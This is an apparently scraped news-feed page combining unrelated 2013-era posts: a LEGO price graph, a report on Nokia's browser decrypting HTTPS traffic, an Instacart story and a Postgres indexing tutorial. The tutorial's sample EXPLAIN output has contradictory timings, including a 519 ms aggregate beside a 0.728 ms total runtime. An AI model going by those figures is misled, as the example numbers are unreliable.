This is older data from a previous post, but I like it so much I decided to include it here also. Basically, I looked at the price of different LEGO sets along with their pieces. The cool thing about all of the LEGO sets is that the number of pieces is always listed. BOOM. Instant graph (well, instant except for looking up all the prices).

Remember, these are 2009 prices but I think the same idea holds true.

This looks linear enough to fit a function. This is what you get.

About 10 cents per LEGO piece. If you had a set with no pieces in it, it would still cost 6 dollars. Yes, there are some sets that don’t fit too well – but for the most part this works nicely.

Nokia: Yes, we decrypt your HTTPS data, but don’t worry about it — Tech News and Analysis

$
0
0

Comments:" Nokia: Yes, we decrypt your HTTPS data, but don’t worry about it — Tech News and Analysis "

URL:http://gigaom.com/2013/01/10/nokia-yes-we-decrypt-your-https-data-but-dont-worry-about-it/


Nokia has confirmed reports that its Xpress Browser decrypts data that flows through HTTPS connections – that includes the connections set up for banking sessions, encrypted email and more. However, it insists that there’s no need for users to panic because it would never access customers’ encrypted data.

The confirmation-slash-denial comes after security researcher Gaurang Pandya, who works for Unisys Global Services in India, detailed on his personal blog how browser traffic from his Series 40 ‘Asha’ phone was getting routed via Nokia’s servers. So far, so Opera Mini: after all, the whole point of using a proxy browser such as this is to compress traffic so you can save on data and thereby cash. This is particularly handy for those on constricted data plans or pay-by-use data, as those using the low-end Series 40 handsets on which the browser is installed by default (it used to be known as the ‘Nokia Browser for Series 40′) are likely to be.

However, it was Pandya’s second post on the subject that caused some alarm. Unlike the first, which looked at general traffic, the Wednesday post specifically examined Nokia’s treatment of HTTPS traffic. It found that such traffic was indeed also getting routed via Nokia’s servers. Crucially, Pandya said that Nokia had access to this data in unencrypted form:

“From the tests that were preformed, it is evident that Nokia is performing Man In The Middle Attack for sensitive HTTPS traffic originated from their phone and hence they do have access to clear text information which could include user credentials to various sites such as social networking, banking, credit card information or anything that is sensitive in nature.”

Pandya pointed out how this potentially clashes with Nokia’s privacy statement, which claims: “we do not collect any usernames or passwords or any related information on your purchase transactions, such as your credit card number during your browsing sessions”.

So, does it clash?

Nokia came back today with a statement on the matter, in which it stressed that it takes the privacy and security of its customers and their data very seriously, and reiterated the point of the Xpress Browser’s compression capabilities, namely so that “users can get faster web browsing and more value out of their data plans”.

“Importantly, the proxy servers do not store the content of web pages visited by our users or any information they enter into them,” the company said. “When temporary decryption of HTTPS connections is required on our proxy servers, to transform and deliver users’ content, it is done in a secure manner. “Nokia has implemented appropriate organizational and technical measures to prevent access to private information. Claims that we would access complete unencrypted information are inaccurate.”

To paraphrase: we decrypt your data, but trust us, we don’t peek. Which is, in a way, fair enough. After all, they need to decrypt the data in order to de-bulk it.

The issue here seems to be around how Nokia informs – or fails to inform – its customers of what’s going on. For example, look at Opera. The messaging around Opera Mini is pretty clear: the browser’s FAQs spell out how it routes traffic. Although you can find out about the Xpress Browser’s equivalent functionality with a bit of online searching, it’s far less explicit to the average user. And this is particularly unfortunate given that the browser is installed by default — people won’t necessarily choose it based on those data-squeezing chops.

And it looks like Nokia belatedly recognizes that fact. The statement continued:

“We aim to be completely transparent on privacy practices. As part of our policy of continuous improvement we will review the information provided in the mobile client in case this can be improved.”

The moral of the story is that those who want absolute security in their mobile browsing should probably steer clear of browsers that compress to cut down on data. Even if Nokia isn’t tapping into that data – and there is no reason to suspect that it is – the very existence of that feature will be a turn-off for the paranoid, and reasonably so. And that’s why Nokia should be up-front about such things.

UPDATE: A kind soul has reminded me that, unlike Xpress Browser and Opera Mini, two other services that also do the compression thing leave HTTPS traffic unperturbed, namely Amazon with its Silk browser and Skyfire. This is arguably how things should be done, although it does of course mean that users don’t get speedier loading and so on on HTTPS pages.

Google Flu Trends | United States

Instacart Adds Trader Joe's To Service

$
0
0

Comments:"Instacart Adds Trader Joe's To Service"

URL:http://thenextweb.com/apps/2013/01/10/grocery-delivery-startup-instacart-adds-trader-joes-to-its-service-allowing-for-on-demand-two-buck-chuck/?utm_source=Twitter&utm_content=Grocery%20delivery%20startup%20Instacart%20adds%20Trader%20Joes%20to%20its%20service,%20allowing%20for%20on-demand%20Two%20Buck%20Chuck&awesm=tnw.to_c0U3e&utm_medium=share%20button&utm_campaign=social%20media


Update: Unbeknownst to us at the time of posting, Instacart has temporarily suspended alcohol sales through its service. Thus, the title of this post was a bit off: you can’t yet buy wine from Trader Joe’s. The company told TNW that it is an issue it is working to solve, and that the ability should be back in a few weeks’ time. We apologize for the confusion. 

Today Instacart begins to roll out support for Trader Joe’s chain of stores to its grocery delivery service. Users that have had their accounts activated to support the new products will be able to toggle between Safeway and Trader Joe’s, giving them the option to purchase from one, or both of the providers.

Given that Instacart is getting its start in the Bay Area, the addition of the new grocery story is non-trivial: many in this part of California swear by it.

We spoke with Instacart’s founder Apoorva Mehta, who noted that “one of the features our customers have repeatedly asked for is the ability to shop at Trader Joe’s.” The company is especially proud of its blended cart system, by which users can buy items from either grocery store in one move, and have them delivered on its scheduled one or three hour deliveries.

Instacart’s model is finding firm footing in its trial markets, telling TNW somewhat elliptically that its economics are functional, and that its growth rates are strong. The company also noted that its attempts at paid marketing produced slim results, and that word of mouth marketing is instead propelling the firm forward.

I’m usually skeptical of such claims, but as I took part in the very same activity in my first review of the company, I must admit the claim’s plausibility.

Instacart is a somewhat interesting startup as it is working in a space where so many have failed, often spectacularly, such as WebVan. The company appears to be succeeding through simple pricing, a functional interface across platforms that makes it simple to use, and economics that make it viable in the long-term, not depending on massive scale to produce efficiencies.

For fun, here’s what your account will look like once it is approved for Trader Joe’s support. The top image is from Safeway.

Versus:

Two buck chuck on demand? Hats off. For more on Instacart, TNW’s past coverage is required reading.

Top Image Credit: Khamis Hammoudeh

More on Postgres Performance - Craig Kerstiens

$
0
0

Comments:"More on Postgres Performance - Craig Kerstiens"

URL:http://craigkerstiens.com/2013/01/10/more-on-postgres-performance/


If you missed my previous post on Understanding Postgres Performance its a great starting point. On this particular post I’m going to dig in to some real life examples of optimizing queries and indexes.

It all starts with stats

I wrote about some of the great new features in Postgres 9.2 in the recent announcement on support of Postgres 9.2 on Heroku. One of those awesome features, is pg_stat_statements. Its not commonly known how much information Postgres keeps about your database (beyond the data of course), but in reality it keeps a great deal. Ranging from basic stuff like table size to cardinality of joins to distribution of indexes, and with pg_stat_statments it keeps a normalized record of when queries are run.

First you’ll want to turn on pg_stat_statments:

CREATE extension pg_stat_statements;

What this means it would record both:

SELECT id 
FROM users
WHERE email LIKE 'craig@heroku.com';

and

SELECT id 
FROM users
WHERE email LIKE 'craig.kerstiens@gmail.com';

To a normalized form which looks like this:

SELECT id 
FROM users
WHERE email LIKE ?;

Understanding them from afar

While Postgres collects a great deal of this information dissecting it to something useful is sometimes more mystery than it should be. This simple query will show a few very key pieces of information that allow you to begin optimizing:

SELECT 
 (total_time / 1000 / 60) as total_minutes, 
 (total_time/calls) as average_time, 
 query 
FROM pg_stat_statements 
ORDER BY 1 DESC 
LIMIT 100;

The above query shows three key things:

The total time a query has occupied against your system in minutes The average time it takes to run in milliseconds The query itself

Giving an output something like:

 total_time | avg_time | query
------------------+------------------+------------------------------------------------------------
 295.761165833319 | 10.1374053278061 | SELECT id FROM users WHERE email LIKE ?
 219.138564283326 | 80.24530822355305 | SELECT * FROM address WHERE user_id = ? AND current = True
(2 rows)

What to optimize

A general rule of thumb is that most of your very common queries that return 1 or a small set of records should return in ~ 1 ms. In some cases there may be queries that regularly run in 4-5 ms, but in most cases ~ 1 ms or less is an ideal.

To pick where to begin I usually attempt to strike some balance between total time and long average time. In this case I’d start with the second probably, as on the first one I could likely shave an order of magnitude off, on the second I’m hopeful to shave two order of magnitudes off thus reducing the time spent on that query from a cumulative 220 minutes down to 2 minutes.

Optimizing

From here you probably want to first example my other detail on understanding the explain plan. I want to highlight some of this with a more specific case based on the second query above. The above second query on an example data set does contain an index on user_id and yet there’s still high query times. To start to get an idea of why I would run:

EXPLAIN ANALYZE
SELECT * 
FROM address 
WHERE user_id = 245 
 AND current = True

This would yield results:

 QUERY PLAN
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Aggregate (cost=4690.88..4690.88 rows=1 width=0) (actual time=519.288..519.289 rows=1 loops=1)
 -> Nested Loop (cost=0.00..4690.66 rows=433 width=0) (actual time=15.302..519.076 rows=213 loops=1)
 -> Index Scan using idx_address_userid on address (cost=0.00..232.52 rows=23 width=4) (actual time=10.143..62.822 rows=1 loops=8)
 Index Cond: (user_id = 245)
 Filter: current
 Rows Removed by Filter: 14
 Total runtime: 219.428 ms
(1 rows)

Hopefully not being too overwhelmed by this due to having read the other detail on query plans we can see that it is using an index as expected. The difference is its having to fetch 15 different rows from the index then discard the bulk of them. The number of rows discarded is showcased by the line:

Rows Removed by Filter: 14

This is just one more of the many improvements in Postgres 9.2 alongside pg_stat_statements.

To further optimize this we would great a conditional OR composite index. A conditional would be where only current = true, where as the composite would index both values. A conditional is commonly more valuable when you have a smaller set of what the values may be, meanwhile the composite is when you have a high variability of values. Creating the conditional index:

CREATE INDEX CONCURRENTLY idx_address_userid_current ON address(user_id) WHERE current = True;

We can then see the query plan is now even further improved as we’d hope:

EXPLAIN ANALYZE
SELECT * 
FROM address 
WHERE user_id = 245 
 AND current = True
 QUERY PLAN
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
 Aggregate (cost=4690.88..4690.88 rows=1 width=0) (actual time=519.288..519.289 rows=1 loops=1)
 -> Index Scan using idx_address_userid_current on address (cost=0.00..232.52 rows=23 width=4) (actual time=10.143..62.822 rows=1 loops=8)
 Index Cond: ((user_id = 245) AND (current = True))
 Total runtime: .728 ms
(1 rows)

For further reading, give Greg Smith’s Postgres High Performance a read

Viewing all 5394 articles
Browse latest View live




Latest Images